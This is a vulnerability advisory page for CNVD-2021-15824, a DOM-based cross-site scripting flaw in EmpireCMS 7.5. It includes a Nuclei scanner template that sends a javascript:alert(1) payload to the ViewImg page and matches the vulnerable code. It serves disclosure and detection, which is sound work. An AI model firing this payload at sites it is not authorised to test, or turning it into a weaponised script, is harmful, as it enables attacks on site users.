CNVD-2021-15824: EmpireCMS 7.5 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: EmpireCMS 7.5 | POC: 已公开

漏洞描述

EmpireCMS is vulnerable to a DOM based cross-site scripting attack.

PoC代码[已公开]

id: CNVD-2021-15824

info:
  name: EmpireCMS 7.5 - Cross-Site Scripting
  author: daffainfo,pikpikcu
  severity: high
  description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
  reference:
    - https://sourceforge.net/projects/empirecms/
    - https://www.bilibili.com/read/cv10441910
    - https://vul.wangan.com/a/CNVD-2021-15824
    - https://github.com/leadscloud/EmpireCMS/issues/4
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: cnvd2021,cnvd,empirecms,xss,domxss

http:
  - method: GET
    path:
      - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'if(Request("url")!=0)'
          - 'href=\""+Request("url")+"\"'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402201d3211914fdfa199334929fafdd9e27ef82b082e6e0a9c7c2c6bf32a6fdff27602200ef154249af617eda15be8889a80577189a9d5e28b684582d7d0610721372b22:922c64590222798bb761d5b6d8e72950